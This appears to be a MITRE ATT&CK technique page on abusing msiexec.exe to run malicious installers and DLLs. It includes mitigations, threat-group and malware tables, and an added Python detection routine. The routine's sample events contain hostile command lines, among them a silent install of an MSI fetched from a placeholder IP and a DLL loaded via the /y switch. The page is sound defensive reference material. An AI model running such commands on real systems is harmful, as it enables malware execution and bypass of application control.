Description
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network-accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and is native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
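As an added illustration (not part of the ATT&CK entry or of any report it cites), the Python triage routine below applies the warning signs from the description to constructed process-creation events: an installer package pulled from a URL or UNC path, a DLL loaded through the `/y` or `/z` register switches, and a silent install. The event fields, the sample command lines and the Office/script-host parent heuristic are assumptions made for the example.

```python
import re

# Constructed sample process-creation events (parent image, command line);
# illustrative only, not taken from any report cited on the page.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\7z2301-x64.msi"'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "msiexec /q /i http://198.51.100.7/update.msi"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec /y C:\Users\Public\helper.dll"},
    {"parent": r"C:\Windows\System32\services.exe",
     "cmdline": "msiexec.exe /V"},          # the Windows Installer service itself
]

REMOTE = re.compile(r"^(https?://|ftp://|\\\\)", re.IGNORECASE)  # URL or UNC share
SCRIPT_OR_OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe",
                            "outlook.exe", "wscript.exe", "cscript.exe", "mshta.exe")

def tokens(cmdline):
    """Split a Windows command line, keeping quoted paths whole and dropping the quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def analyse(event):
    """Return the findings for one msiexec process-creation event (empty list = benign)."""
    findings = []
    args = tokens(event["cmdline"])[1:]             # drop the image name itself
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    quiet = False
    for i, arg in enumerate(args):
        # msiexec accepts both "/" and "-" as option prefixes, case-insensitively
        opt = arg[1:].lower() if arg[:1] in ("/", "-") else None
        nxt = args[i + 1] if i + 1 < len(args) else ""
        if opt in ("i", "package") and REMOTE.match(nxt):
            findings.append("package fetched from a network location: " + nxt)
        elif opt in ("y", "z"):                      # /y and /z load a DLL to (un)register it
            findings.append("DLL loaded through msiexec: " + nxt)
        elif opt is not None and opt.startswith("q"):  # /q, /qn, /quiet ...
            quiet = True
    if findings and quiet:
        findings.append("silent install switch combined with the above")
    if findings and parent in SCRIPT_OR_OFFICE_PARENTS:
        findings.append("launched by an Office or script-host parent: " + parent)
    return findings

def triage(events):
    """Map each suspicious command line to its findings; benign events are omitted."""
    return {e["cmdline"]: analyse(e) for e in events if analyse(e)}
```

A local, interactive install from Explorer and the service's own `msiexec.exe /V` produce no findings, so the rule stays quiet on ordinary software deployment.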
Mitigations (2)
| ID | Mitigation | Description |
|---|---|---|
| M1042 | Disable or Remove Feature or Program | Consider disabling the AlwaysInstallElevated policy to prevent elevated execution of Windows Installer packages.(Citation: Microsoft AlwaysInstallElevated 2018) |
| M1026 | Privileged Account Management | Restrict execution of Msiexec.exe to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage. |
Threat Groups (6)
| ID | Group | Context |
|---|---|---|
| G0021 | Molerats | [Molerats](https://attack.mitre.org/groups/G0021) has used msiexec.exe to execute an MSI payload.(Citation: Unit42 Molerat Mar 2020) |
| G0092 | TA505 | [TA505](https://attack.mitre.org/groups/G0092) has used `msiexec` to download and execute malicious Windows Installer files.(Citation: Cybe... |
| G0075 | Rancor | [Rancor](https://attack.mitre.org/groups/G0075) has used `msiexec` to download and execute malicious installer files over HTTP.(Citation: R... |
| G0128 | ZIRCONIUM | [ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used the msiexec.exe command-line utility to download and execute malicious MSI files.(Citation... |
| G0095 | Machete | [Machete](https://attack.mitre.org/groups/G0095) has used msiexec to install the [Machete](https://attack.mitre.org/software/S0409) malware.(Citation:... |
| G0082 | APT38 | [APT38](https://attack.mitre.org/groups/G0082) has used `msiexec.exe` to execute malicious files.(Citation: 1 - appv) |
Associated Software (23)
| ID | Name | Type | Context |
|---|---|---|---|
| S0631 | Chaes | Malware | [Chaes](https://attack.mitre.org/software/S0631) has used .MSI files as an initial way to start the infection chain.(Citation: Cybereason Chaes Nov 20... |
| S0038 | Duqu | Malware | [Duqu](https://attack.mitre.org/software/S0038) has used `msiexec` to execute malicious Windows Installer packages. Additionally, a PROPERT... |
| S0455 | Metamorfo | Malware | [Metamorfo](https://attack.mitre.org/software/S0455) has used MsiExec.exe to automatically execute files.(Citation: Fortinet Metamorfo Feb 2020)(Citat... |
| S1160 | Latrodectus | Malware | [Latrodectus](https://attack.mitre.org/software/S1160) has called `msiexec` to install remotely-hosted MSI files.(Citation: Latrodectus APR 2024)(Cita... |
| S1052 | DEADEYE | Malware | [DEADEYE](https://attack.mitre.org/software/S1052) can use `msiexec.exe` for execution of malicious DLL.(Citation: Mandiant APT41) |
| S0483 | IcedID | Malware | [IcedID](https://attack.mitre.org/software/S0483) can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a no... |
| S1122 | Mispadu | Malware | [Mispadu](https://attack.mitre.org/software/S1122) has been installed via MSI installer.(Citation: SCILabs Malteiro 2021)(Citation: ESET Security Misp... |
| S0662 | RCSession | Malware | [RCSession](https://attack.mitre.org/software/S0662) has the ability to execute inside the msiexec.exe process.(Citation: Profero APT27 December 2020) |
| S0530 | Melcoz | Malware | [Melcoz](https://attack.mitre.org/software/S0530) can use MSI files with embedded VBScript for execution.(Citation: Securelist Brazilian Banking Malwa... |
| S0650 | QakBot | Malware | [QakBot](https://attack.mitre.org/software/S0650) can use MSIExec to spawn multiple cmd.exe processes.(Citation: Crowdstrike Qakbot October 2020) |
| S0531 | Grandoreiro | Malware | [Grandoreiro](https://attack.mitre.org/software/S0531) can use MSI files to execute DLLs.(Citation: Securelist Brazilian Banking Malware July 2020) |
| S9021 | DOWNIISSA | Malware | [DOWNIISSA](https://attack.mitre.org/software/S9021) can create an instance of msiexec.exe and inject [LODEINFO](https://attack.mitre.org/software/S90... |
| S0584 | AppleJeus | Malware | [AppleJeus](https://attack.mitre.org/software/S0584) has been installed via MSI installer.(Citation: CISA AppleJeus Feb 2021) |
| S0528 | Javali | Malware | [Javali](https://attack.mitre.org/software/S0528) has used the MSI installer to download and execute malicious payloads.(Citation: Securelist Brazilia... |
| S1240 | RedLine Stealer | Malware | [RedLine Stealer](https://attack.mitre.org/software/S1240) has been installed via MSI Installer.(Citation: McAfee RedLine Stealer April 2024) |
| S0481 | Ragnar Locker | Malware | [Ragnar Locker](https://attack.mitre.org/software/S0481) has been delivered as an unsigned MSI package that was executed with `msiexec.exe`... |
| S9034 | Tsundere Botnet | Malware | [Tsundere Botnet](https://attack.mitre.org/software/S9034) has been distributed via an MSI installer.(Citation: SecureListUbiedo_Tsundere_Nov2025) |
| S1130 | Raspberry Robin | Malware | [Raspberry Robin](https://attack.mitre.org/software/S1130) uses msiexec.exe for post-installation communication to command and control infrastructure.... |
| S0451 | LoudMiner | Malware | [LoudMiner](https://attack.mitre.org/software/S0451) used an MSI installer to install the virtualization software.(Citation: ESET LoudMiner June 2019)... |
| S0449 | Maze | Malware | [Maze](https://attack.mitre.org/software/S0449) has delivered components for its ransomware attacks using MSI files, some of which have been executed ... |
References
- Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.
- LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019.
- Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.
- Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020.
Frequently Asked Questions
What is T1218.007 (Msiexec)?
T1218.007 is a MITRE ATT&CK technique named 'Msiexec'. It belongs to the Stealth tactic. Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installatio...
How can T1218.007 be detected?
Detection of T1218.007 (Msiexec) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1218.007?
There are 2 documented mitigations for T1218.007. Key mitigations include: Disable or Remove Feature or Program, Privileged Account Management.
Which threat groups use T1218.007?
Known threat groups using T1218.007 include: Molerats, TA505, Rancor, ZIRCONIUM, Machete, APT38.